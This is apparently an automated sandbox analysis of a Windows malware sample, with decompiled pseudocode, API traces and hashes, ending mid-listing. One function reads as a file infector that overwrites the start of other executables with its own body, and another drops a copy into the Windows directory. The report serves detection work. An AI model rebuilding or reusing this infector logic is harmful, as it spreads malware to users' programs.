                                                                                                                          Function 004071D0, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 184COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 83%
                                                                                                                          			E004071D0(void* __eax, void* __ebx, void* __edi, void* __esi) {
				char _v8;
				char _v9;
				char _v16;
				char _v40254;
				char _v41487;
				char _v41488;
				char _v41492;
				char _v41496;
				char _v41500;
				char _v41504;
				void* _t45;
				void* _t80;
				void* _t82;
				long _t85;
				CHAR* _t130;
				intOrPtr _t150;
				void* _t154;
				void* _t155;
				long _t173;
				void* _t177;
				void* _t178;

				_t128 = __ebx;
				_t177 = _t178;
				_push(__eax);
				_t45 = 0xa;
				goto L1;
				L17:
				_pop(_t150);
				 *[fs:eax] = _t150;
				_push(E00407493);
				E004030B8( &_v41504, 4);
				return E00403094( &_v8);
				L1:
				_t178 = _t178 + 0xfffff004;
				_push(_t45);
				_t45 = _t45 - 1;
				_t180 = _t45;
				if(_t45 != 0) {
					goto L1;
				} else {
					_push(__ebx);
					_v41504 = 0;
					_v41500 = 0;
					_v41496 = 0;
					_v41492 = 0;
					E004033FC(_v8);
					_push(_t177);
					_push(0x40748c);
					_push( *[fs:eax]);
					 *[fs:eax] = _t178 + 0xfffffde8;
					_v9 = 0;
					E004031F4( &_v41492, 3, 0x4091c0);
					if(E00406FE4(_v8, __ebx, _v41492, _t180) != 0) {
						E00404F34(_v8,  &_v41496);
						E0040312C( &_v8, _v41496);
						E00404F90( &_v41500, _t128, 3);
						_push(E0040340C(_v41500));
						_t129 = E0040340C(_v8);
						_pop(_t154);
						if(E00404B38(_t68, _t154) == 0) {
							E00405008( &_v41504, _t129, 3);
							_t155 = E0040340C(_v41504);
							if(E00404B38(_t129, _t155) == 0 && E004034EC("\\PROGRA~1\\", _v8) != 3) {
								_t80 = E00404F6C(_v8);
								if(_t80 > 0xa200 && _t80 <= 0x989680) {
									_t82 = E00407130(_v8, _t129); // executed
									if(_t82 == 0) {
										_v9 = 1;
										_t130 = E0040340C(_v8);
										_t85 = GetFileAttributesA(_t130); // executed
										_t173 = _t85;
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(_t130, 0);
										}
										_t131 = E00405BDC();
										_t175 = E004064CC();
										E00406CA8(_t87, 0, _v8);
										E00406510(_t175, _t86);
										E00405974();
										E00404198();
										E00405988(_t131);
										E00404520(_t131);
										E00404520(_t175);
										_t132 = E00404B68(_v8, 0xc0000303);
										if(_t103 != 0xffffffff) {
											E00404BC4(_t132, 2,  &_v41488);
											if(_v41488 == 0x4d && _v41487 == 0x5a) {
												E00404BB4(_t132, 0, 0);
												E00404BC4(_t132, 0xa200,  &_v41488);
												E0040254C( &_v40254, 4,  &_v16);
												E00407080( &_v41488, _v16, 0x3e8);
												E00404BB4(_t132, 0, 0);
												E00404BE0(_t132, 0xa200, 0x40a698);
												E00404BB4(_t132, 2, 0);
												E00404BE0(_t132, 0xa200,  &_v41488);
											}
										}
										E00404B90(_t132);
										if((_t173 & 0x00000001) > 0) {
											SetFileAttributesA(E0040340C(_v8), _t173);
										}
									}
								}
							}
						}
					}
					goto L17;
				}
			}
























                                                                                                                          0x004071d0
                                                                                                                          0x004071d1
                                                                                                                          0x004071d3
                                                                                                                          0x004071d4
                                                                                                                          0x004071d4
                                                                                                                          0x00407466
                                                                                                                          0x00407468
                                                                                                                          0x0040746b
                                                                                                                          0x0040746e
                                                                                                                          0x0040747e
                                                                                                                          0x0040748b
                                                                                                                          0x004071d9
                                                                                                                          0x004071d9
                                                                                                                          0x004071df
                                                                                                                          0x004071e0
                                                                                                                          0x004071e0
                                                                                                                          0x004071e1
                                                                                                                          0x00000000
                                                                                                                          0x004071e3
                                                                                                                          0x004071ec
                                                                                                                          0x004071f1
                                                                                                                          0x004071f7
                                                                                                                          0x004071fd
                                                                                                                          0x00407203
                                                                                                                          0x0040720f
                                                                                                                          0x00407216
                                                                                                                          0x00407217
                                                                                                                          0x0040721c
                                                                                                                          0x0040721f
                                                                                                                          0x00407222
                                                                                                                          0x00407236
                                                                                                                          0x0040724b
                                                                                                                          0x0040725a
                                                                                                                          0x00407268
                                                                                                                          0x00407273
                                                                                                                          0x00407283
                                                                                                                          0x0040728c
                                                                                                                          0x00407290
                                                                                                                          0x00407298
                                                                                                                          0x004072a4
                                                                                                                          0x004072b7
                                                                                                                          0x004072bf
                                                                                                                          0x004072de
                                                                                                                          0x004072e8
                                                                                                                          0x004072fc
                                                                                                                          0x00407303
                                                                                                                          0x00407309
                                                                                                                          0x00407315
                                                                                                                          0x00407318
                                                                                                                          0x0040731d
                                                                                                                          0x00407325
                                                                                                                          0x0040732a
                                                                                                                          0x0040732a
                                                                                                                          0x00407334
                                                                                                                          0x0040733b
                                                                                                                          0x00407344
                                                                                                                          0x0040734d
                                                                                                                          0x00407359
                                                                                                                          0x00407368
                                                                                                                          0x00407379
                                                                                                                          0x00407380
                                                                                                                          0x00407387
                                                                                                                          0x00407399
                                                                                                                          0x0040739e
                                                                                                                          0x004073b1
                                                                                                                          0x004073bd
                                                                                                                          0x004073d2
                                                                                                                          0x004073e4
                                                                                                                          0x004073f7
                                                                                                                          0x0040740a
                                                                                                                          0x00407415
                                                                                                                          0x00407426
                                                                                                                          0x00407431
                                                                                                                          0x00407443
                                                                                                                          0x00407443
                                                                                                                          0x004073bd
                                                                                                                          0x0040744a
                                                                                                                          0x00407455
                                                                                                                          0x00407461
                                                                                                                          0x00407461
                                                                                                                          0x00407455
                                                                                                                          0x00407303
                                                                                                                          0x004072e8
                                                                                                                          0x004072bf
                                                                                                                          0x00407298
                                                                                                                          0x00000000
                                                                                                                          0x0040724b

                                                                                                                          APIs
                                                                                                                          • GetFileAttributesA.KERNEL32(00000000), ref: 00407318
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 0040732A
                                                                                                                            • Part of subcall function 00404B68: CreateFileA.KERNEL32(00408220,80000301,80000301,00000000,80000301,80000301,00000000,00404CB4,00000000,00404CE6), ref: 00404B88
                                                                                                                          • SetFileAttributesA.KERNEL32(00000000,00000000,00000000), ref: 00407461
                                                                                                                            • Part of subcall function 00404BC4: ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                            • Part of subcall function 00404BB4: SetFilePointer.KERNEL32(00000000,000003E8,00000000,?,00407179,00000000,004071BF,?,00000000), ref: 00404BBC
                                                                                                                            • Part of subcall function 00404BE0: WriteFile.KERNEL32(00000000,MZP,0000A200,?,00000000,?,?,0040742B), ref: 00404BEA
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$Attributes$CreatePointerReadWrite
                                                                                                                          • String ID: M$MZP$Z$\PROGRA~1\
                                                                                                                          • API String ID: 997383822-4093836345
                                                                                                                          • Opcode ID: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                                                                          • Instruction ID: 377d96c4788612fdddee84976f6eb16641268004b287eb3b442383de46351668
                                                                                                                          • Opcode Fuzzy Hash: 41512908c4d33e48550e6b3331c925b36c29bc90fc27bbf57195ac31950a3692
                                                                                                                          • Instruction Fuzzy Hash: 71514370B042045BDB10FB6ACC82A8EB7A59F85308F1085BBB504B73D3DA7DEF454A5A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401788, Relevance: 6.0, APIs: 4, Instructions: 48memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 68%
                                                                                                                          			E00401788() {
				void* _t11;
				signed int _t13;
				intOrPtr _t19;
				void* _t20;
				intOrPtr _t23;

				_push(_t23);
				_push(E0040183E);
				_push( *[fs:edx]);
				 *[fs:edx] = _t23;
				_push(0x40a5b4);
				L004010DC();
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010E4();
				}
				E0040114C(0x40a5d4);
				E0040114C(0x40a5e4);
				E0040114C(0x40a610);
				_t11 = LocalAlloc(0, 0xff8); // executed
				 *0x40a60c = _t11;
				if( *0x40a60c != 0) {
					_t13 = 3;
					do {
						_t20 =  *0x40a60c; // 0x0
						 *((intOrPtr*)(_t20 + _t13 * 4 - 0xc)) = 0;
						_t13 = _t13 + 1;
					} while (_t13 != 0x401);
					 *((intOrPtr*)(0x40a5f8)) = 0x40a5f4;
					 *0x40a5f4 = 0x40a5f4;
					 *0x40a600 = 0x40a5f4;
					 *0x40a5ac = 1;
				}
				_pop(_t19);
				 *[fs:eax] = _t19;
				_push(0x401845);
				if( *0x40a035 != 0) {
					_push(0x40a5b4);
					L004010EC();
					return 0;
				}
				return 0;
			}








                                                                                                                          0x0040178d
                                                                                                                          0x0040178e
                                                                                                                          0x00401793
                                                                                                                          0x00401796
                                                                                                                          0x00401799
                                                                                                                          0x0040179e
                                                                                                                          0x004017aa
                                                                                                                          0x004017ac
                                                                                                                          0x004017b1
                                                                                                                          0x004017b1
                                                                                                                          0x004017bb
                                                                                                                          0x004017c5
                                                                                                                          0x004017cf
                                                                                                                          0x004017db
                                                                                                                          0x004017e0
                                                                                                                          0x004017ec
                                                                                                                          0x004017ee
                                                                                                                          0x004017f3
                                                                                                                          0x004017f3
                                                                                                                          0x004017fb
                                                                                                                          0x004017ff
                                                                                                                          0x00401800
                                                                                                                          0x0040180c
                                                                                                                          0x0040180f
                                                                                                                          0x00401811
                                                                                                                          0x00401816
                                                                                                                          0x00401816
                                                                                                                          0x0040181f
                                                                                                                          0x00401822
                                                                                                                          0x00401825
                                                                                                                          0x00401831
                                                                                                                          0x00401833
                                                                                                                          0x00401838
                                                                                                                          0x00000000
                                                                                                                          0x00401838
                                                                                                                          0x0040183d

                                                                                                                          APIs
                                                                                                                          • RtlInitializeCriticalSection.KERNEL32(0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 0040179E
                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0040A5B4,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017B1
                                                                                                                          • LocalAlloc.KERNEL32(00000000,00000FF8,0040A5B4,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 004017DB
                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0040A5B4,00401845,00000000,0040183E,?,?,00402022,0040A5F4,00000000,00000000,?,?,00401A11,00401A26,00401B77), ref: 00401838
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 730355536-0
                                                                                                                          • Opcode ID: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction ID: b00ea9f5082304a52c30b3310984ccb38099dd734a88c9f27aa2559637ee1f83
                                                                                                                          • Opcode Fuzzy Hash: 3b04e8016ad8e9f8d98138e13965f200bb98bfb7b6ef7e396ad35bd5d2b4b672
                                                                                                                          • Instruction Fuzzy Hash: 400184B0604380AEE715AF6A9D06B167BA4E749704F04C53FA140B66F2CA7D44A0CB5F
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00406B48, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 120windowCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 89%
                                                                                                                          			E00406B48(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				struct _ICONINFO _v48;
				void* _t65;
				void* _t72;
				signed int _t81;
				intOrPtr* _t82;
				intOrPtr* _t85;
				void* _t98;
				void* _t99;
				intOrPtr _t103;
				intOrPtr _t104;
				signed int _t111;
				intOrPtr* _t112;
				intOrPtr _t116;
				intOrPtr _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t124;

				_v28 = 0;
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_push(_t124);
				_push(0x406c97);
				_push( *[fs:eax]);
				 *[fs:eax] = _t124 + 0xffffffd4;
				_t116 = _v12;
				if(_t116 < 0) {
					L8:
					_v24 = E00405968();
					_push(_v12 + 1 + _v12 + 1);
					E00403B24();
					_t117 = _v12;
					if(_t117 >= 0) {
						_t120 = _t117 + 1;
						_v20 = 0;
						_t85 = _v8;
						do {
							GetIconInfo( *( *_t85 + 0x1c),  &_v48);
							_t81 = _v20 + _v20;
							 *((intOrPtr*)(_v28 + _t81 * 4)) = _v48.hbmColor;
							 *((intOrPtr*)(_v28 + 4 + _t81 * 4)) = _v48.hbmMask;
							_v20 = _v20 + 1;
							_t85 = _t85 + 4;
							_t120 = _t120 - 1;
						} while (_t120 != 0);
					}
					_t65 = E00406638(_v28, _v16, E00403970()); // executed
					if(_t65 == 0) {
						E00405990(_v16);
					}
					_t118 = E00403970();
					if(_t118 >= 0) {
						_t119 = _t118 + 1;
						_v20 = 0;
						do {
							_t72 =  *(_v28 + _v20 * 4);
							if(_t72 != 0) {
								DeleteObject(_t72);
							}
							_v20 = _v20 + 1;
							_t119 = _t119 - 1;
						} while (_t119 != 0);
					}
				} else {
					_t121 = _t116 + 1;
					_v20 = 0;
					_t82 = _v8;
					while( *((intOrPtr*)( *_t82 + 0x1c)) != 0) {
						_t111 = _v20 + 1;
						_t98 = _v12 - _t111;
						if(_t98 < 0) {
							L7:
							_v20 = _v20 + 1;
							_t82 = _t82 + 4;
							_t121 = _t121 - 1;
							if(_t121 != 0) {
								continue;
							} else {
								goto L8;
							}
						} else {
							_t99 = _t98 + 1;
							_t112 = _v8 + _t111 * 4;
							while( *((intOrPtr*)( *_t82 + 0x18)) !=  *((intOrPtr*)( *_t112 + 0x18))) {
								_t112 = _t112 + 4;
								_t99 = _t99 - 1;
								if(_t99 != 0) {
									continue;
								} else {
									goto L7;
								}
								goto L18;
							}
						}
						goto L18;
					}
				}
				L18:
				_pop(_t103);
				 *[fs:eax] = _t103;
				_push(E00406C9E);
				_t104 =  *0x406b28; // 0x406b2c
				return E00403B30( &_v28, _t104);
			}




























                                                                                                                          0x00406b53
                                                                                                                          0x00406b56
                                                                                                                          0x00406b59
                                                                                                                          0x00406b5c
                                                                                                                          0x00406b61
                                                                                                                          0x00406b62
                                                                                                                          0x00406b67
                                                                                                                          0x00406b6a
                                                                                                                          0x00406b6d
                                                                                                                          0x00406b72
                                                                                                                          0x00406bbc
                                                                                                                          0x00406bc4
                                                                                                                          0x00406bcd
                                                                                                                          0x00406bdc
                                                                                                                          0x00406be4
                                                                                                                          0x00406be9
                                                                                                                          0x00406beb
                                                                                                                          0x00406bec
                                                                                                                          0x00406bf3
                                                                                                                          0x00406bf6
                                                                                                                          0x00406c00
                                                                                                                          0x00406c08
                                                                                                                          0x00406c10
                                                                                                                          0x00406c19
                                                                                                                          0x00406c1d
                                                                                                                          0x00406c20
                                                                                                                          0x00406c23
                                                                                                                          0x00406c23
                                                                                                                          0x00406bf6
                                                                                                                          0x00406c36
                                                                                                                          0x00406c3d
                                                                                                                          0x00406c47
                                                                                                                          0x00406c47
                                                                                                                          0x00406c54
                                                                                                                          0x00406c58
                                                                                                                          0x00406c5a
                                                                                                                          0x00406c5b
                                                                                                                          0x00406c62
                                                                                                                          0x00406c68
                                                                                                                          0x00406c6d
                                                                                                                          0x00406c70
                                                                                                                          0x00406c70
                                                                                                                          0x00406c75
                                                                                                                          0x00406c78
                                                                                                                          0x00406c78
                                                                                                                          0x00406c62
                                                                                                                          0x00406b74
                                                                                                                          0x00406b74
                                                                                                                          0x00406b75
                                                                                                                          0x00406b7c
                                                                                                                          0x00406b7f
                                                                                                                          0x00406b8e
                                                                                                                          0x00406b92
                                                                                                                          0x00406b94
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb3
                                                                                                                          0x00406bb6
                                                                                                                          0x00406bb9
                                                                                                                          0x00406bba
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406b96
                                                                                                                          0x00406b96
                                                                                                                          0x00406b9a
                                                                                                                          0x00406b9d
                                                                                                                          0x00406bad
                                                                                                                          0x00406bb0
                                                                                                                          0x00406bb1
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00406bb1
                                                                                                                          0x00406b9d
                                                                                                                          0x00000000
                                                                                                                          0x00406b94
                                                                                                                          0x00406b7f
                                                                                                                          0x00406c7b
                                                                                                                          0x00406c7d
                                                                                                                          0x00406c80
                                                                                                                          0x00406c83
                                                                                                                          0x00406c8b
                                                                                                                          0x00406c96

                                                                                                                          APIs
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: DeleteIconInfoObject
                                                                                                                          • String ID: ,k@
                                                                                                                          • API String ID: 2689914137-1053005162
                                                                                                                          • Opcode ID: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction ID: dacdd831d29519e08e7e99a77df17fc26ef5cc856f0b9114ccf97923e4886ce8
                                                                                                                          • Opcode Fuzzy Hash: 5b49ef8e9806a3f921fc3957ab8aab80d154f68e659bcce45d0d70881c4801f7
                                                                                                                          • Instruction Fuzzy Hash: 9F413AB0E0021A9FDB14DF99C881AAEBBB4FF48314F11407AD942B7391D734AE51CB98
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00401304, Relevance: 3.8, APIs: 3, Instructions: 45memoryCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00401304(void* __eax, void** __ecx, void* __edx) {
				void* _t4;
				void** _t9;
				void* _t13;
				void* _t14;
				long _t16;
				void* _t17;

				_t9 = __ecx;
				_t14 = __edx;
				_t17 = __eax;
				 *(__ecx + 4) = 0x100000;
				_t4 = VirtualAlloc(__eax, 0x100000, 0x2000, 4); // executed
				_t13 = _t4;
				 *_t9 = _t13;
				if(_t13 == 0) {
					_t16 = _t14 + 0x0000ffff & 0xffff0000;
					_t9[1] = _t16;
					_t4 = VirtualAlloc(_t17, _t16, 0x2000, 4); // executed
					 *_t9 = _t4;
				}
				if( *_t9 != 0) {
					_t4 = E00401154(0x40a5d4, _t9);
					if(_t4 == 0) {
						VirtualFree( *_t9, 0, 0x8000);
						 *_t9 = 0;
						return 0;
					}
				}
				return _t4;
			}









                                                                                                                          0x00401308
                                                                                                                          0x0040130a
                                                                                                                          0x0040130c
                                                                                                                          0x0040130e
                                                                                                                          0x00401322
                                                                                                                          0x00401327
                                                                                                                          0x00401329
                                                                                                                          0x0040132d
                                                                                                                          0x00401335
                                                                                                                          0x0040133b
                                                                                                                          0x00401347
                                                                                                                          0x0040134c
                                                                                                                          0x0040134c
                                                                                                                          0x00401351
                                                                                                                          0x0040135a
                                                                                                                          0x00401361
                                                                                                                          0x0040136d
                                                                                                                          0x00401374
                                                                                                                          0x00000000
                                                                                                                          0x00401374
                                                                                                                          0x00401361
                                                                                                                          0x0040137a

                                                                                                                          APIs
                                                                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 00401322
                                                                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 00401347
                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,0040A5E4,?,?,?,00401670), ref: 0040136D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: Virtual$Alloc$Free
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3668210933-0
                                                                                                                          • Opcode ID: e17c01c161f917c304470fc5bdd154c62ee178939f0222dfd3bc6fa3e96f4c6e
                                                                                                                          • Instruction ID: 68b8f7d00e12c5576b1b617c6ecf0cca3c834072eeb02b8dde9827deaaa3e0cb
                                                                                                                          • Opcode Fuzzy Hash: e17c01c161f917c304470fc5bdd154c62ee178939f0222dfd3bc6fa3e96f4c6e
                                                                                                                          • Instruction Fuzzy Hash: 22F0AFB1641320AAFB316A6A8C86F433AD8DB45794F104076BB48FF7DAD6B95800866C
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 004079A0, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 86fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 51%
                                                                                                                          			E004079A0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				void* _t31;
				void* _t59;
				intOrPtr _t73;
				void* _t82;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t82 = __edi;
				_t54 = __ebx;
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(__ebx);
				_push(_t86);
				_push(0x407ac4);
				_push( *[fs:eax]);
				 *[fs:eax] = _t86;
				E00407080(0x4091e0, 0xb, 0xb);
				E004031F4( &_v12, 0xb, 0x4091e0);
				_push(_v12);
				E00404F90( &_v16, __ebx, 0xb);
				_pop(_t59);
				E00403258( &_v8, _t59, _v16);
				if(E00404B9C() != 0) {
					DeleteFileA(E0040340C(_v8)); // executed
				}
				_t31 = E00404BF8(E0040340C(_v8), _t54, 0xa200, 0x40a698, _t82, _t83); // executed
				if(_t31 != 0) {
					E00407080(0x4091ec, 0x1a, 0x1a);
					E004031F4( &_v20, 0x1a, 0x4091ec);
					_t55 = E0040575C(0x80000000, 0x1a, _v20);
					E00407080(0x409208, 8, 8);
					E004031F4( &_v28, 8, 0x409208);
					E00403258( &_v24, _v28, _v8);
					E0040578C(_t40, _v24, 0);
					E004057CC(_t55);
				}
				_pop(_t73);
				 *[fs:eax] = _t73;
				_push(E00407ACB);
				return E004030B8( &_v28, 6);
			}















                                                                                                                          0x004079a0
                                                                                                                          0x004079a0
                                                                                                                          0x004079a0
                                                                                                                          0x004079a5
                                                                                                                          0x004079a6
                                                                                                                          0x004079a7
                                                                                                                          0x004079a8
                                                                                                                          0x004079a9
                                                                                                                          0x004079aa
                                                                                                                          0x004079ab
                                                                                                                          0x004079ae
                                                                                                                          0x004079af
                                                                                                                          0x004079b4
                                                                                                                          0x004079b7
                                                                                                                          0x004079c9
                                                                                                                          0x004079db
                                                                                                                          0x004079e3
                                                                                                                          0x004079e7
                                                                                                                          0x004079f2
                                                                                                                          0x004079f3
                                                                                                                          0x00407a02
                                                                                                                          0x00407a0d
                                                                                                                          0x00407a0d
                                                                                                                          0x00407a24
                                                                                                                          0x00407a2b
                                                                                                                          0x00407a3c
                                                                                                                          0x00407a4e
                                                                                                                          0x00407a60
                                                                                                                          0x00407a71
                                                                                                                          0x00407a83
                                                                                                                          0x00407a91
                                                                                                                          0x00407a9d
                                                                                                                          0x00407aa4
                                                                                                                          0x00407aa4
                                                                                                                          0x00407aab
                                                                                                                          0x00407aae
                                                                                                                          0x00407ab1
                                                                                                                          0x00407ac3

                                                                                                                          APIs
                                                                                                                            • Part of subcall function 00404F90: GetWindowsDirectoryA.KERNEL32(?,00000105,00000000,00404FFA,?,?,?,00407EB6,00000000,00408020,?,?,00000000,00000000,?,0040819C), ref: 00404FBE
                                                                                                                            • Part of subcall function 00404B9C: GetFileAttributesA.KERNEL32(00000000,00407EDD,00000000,00408020,?,?,00000000,00000000,?,0040819C,00000000,00408220), ref: 00404BA2
                                                                                                                          • DeleteFileA.KERNEL32(00000000,00000000,00407AC4,?,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00408200,00000000,00408220), ref: 00407A0D
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: File$AttributesDeleteDirectoryWindows
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 3550186980-2889622443
                                                                                                                          • Opcode ID: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction ID: 69b580403c23d9cc841dfa7c227de2d2e2536c961132663fd28ad6461d03daee
                                                                                                                          • Opcode Fuzzy Hash: 3ee79c2a49ddb8816c4432ff5edea5131a792a15af00d109a84fb823656587da
                                                                                                                          • Instruction Fuzzy Hash: 91212F70B04109ABDB04FAA5C85279F7B69EB85304F50847EA501BB3C2DF3CEE05976A
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BC4, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BC4(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				DWORD* _t8;

				_t2 = ReadFile(__eax, __edx, __ecx, _t8, 0); // executed
				_t3 = 0;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}






                                                                                                                          0x00404bcf
                                                                                                                          0x00404bd6
                                                                                                                          0x00404bd7
                                                                                                                          0x00000000
                                                                                                                          0x00404bd9
                                                                                                                          0x00404bdc

                                                                                                                          APIs
                                                                                                                          • ReadFile.KERNEL32(00000000,MZP,?,?,00000000,00000000,?,00404CC7,00000000,00404CE6), ref: 00404BCF
                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000005.00000002.565960325.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                          • Associated: 00000005.00000002.565915391.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566051764.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                          • Associated: 00000005.00000002.566214994.0000000000418000.00000002.00020000.sdmp Download File
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID: FileRead
                                                                                                                          • String ID: MZP
                                                                                                                          • API String ID: 2738559852-2889622443
                                                                                                                          • Opcode ID: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction ID: 3ae4d4c2ce5489376b9a0e409b07906e0c93d400668ceedc4e43a286d92feaa2
                                                                                                                          • Opcode Fuzzy Hash: 07c637d247b66d3b0a9c7b3941f0c52b1614d40a6673a640bb3ecb2c78beae31
                                                                                                                          • Instruction Fuzzy Hash: DEC04CA12582083AF51061A29C16F23355CC781799F12456AB704E51D1F096F81000A9
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00404BE0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15fileCOMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 100%
                                                                                                                          			E00404BE0(void* __eax, long __ecx, void* __edx) {
				int _t2;
				void* _t3;
				void* _t7;
				DWORD* _t9;

				_t2 = WriteFile(__eax, __edx, __ecx, _t9, 0); // executed
				_t3 = _t7;
				if(_t2 == 0) {
					return 0;
				}
				return _t3;
			}







                                                                                                                          0x00404bea
                                                                                                                          0x00404bf1
                                                                                                                          0x00404bf2
                                                                                                                          0x00000000
